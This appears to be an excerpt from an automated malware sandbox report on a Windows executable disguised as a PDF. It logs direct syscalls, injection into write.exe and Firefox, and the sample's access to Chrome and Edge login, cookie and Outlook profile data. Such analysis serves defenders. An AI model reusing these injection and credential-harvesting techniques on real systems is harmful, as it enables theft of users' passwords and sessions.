Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF113 mov eax, dword ptr fs:[00000030h] 2_2_36ADF113
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0510F mov eax, dword ptr fs:[00000030h] 2_2_36B0510F

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x7756480C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtClose: Direct from: 0x77562A8C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateKey: Direct from: 0x77562B8C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationThread: Direct from: 0x77562A6C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryAttributesFile: Direct from: 0x77562D8C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenKeyEx: Direct from: 0x77562ABC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryInformationProcess: Direct from: 0x77562B46
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtResumeThread: Direct from: 0x77562EDC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateUserProcess: Direct from: 0x7756363C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtProtectVirtualMemory: Direct from: 0x77562EBC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtWriteVirtualMemory: Direct from: 0x7756482C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtDelayExecution: Direct from: 0x77562CFC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtWriteVirtualMemory: Direct from: 0x77562D5C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtMapViewOfSection: Direct from: 0x77562C3C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtResumeThread: Direct from: 0x775635CC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77562B1C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtReadFile: Direct from: 0x775629FC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQuerySystemInformation: Direct from: 0x77562D1C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationProcess: Direct from: 0x77562B7C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtNotifyChangeKey: Direct from: 0x77563B4C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenFile: Direct from: 0x77562CEC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77563BBC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtSetInformationThread: Direct from: 0x77556319
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryInformationToken: Direct from: 0x77562BCC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtReadVirtualMemory: Direct from: 0x77562DAC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtCreateFile: Direct from: 0x77562F0C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtProtectVirtualMemory: Direct from: 0x77557A4E
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQueryVolumeInformationFile: Direct from: 0x77562E4C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtDeviceIoControlFile: Direct from: 0x77562A0C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtQuerySystemInformation: Direct from: 0x775647EC
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtAllocateVirtualMemory: Direct from: 0x77562B0C
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe NtOpenSection: Direct from: 0x77562D2C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Section loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: read write
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\write.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\write.exe Thread register set: target process: 3748
Source: C:\Windows\SysWOW64\write.exe Thread APC queued: target process: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Process created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_00405D51

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\write.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\write.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY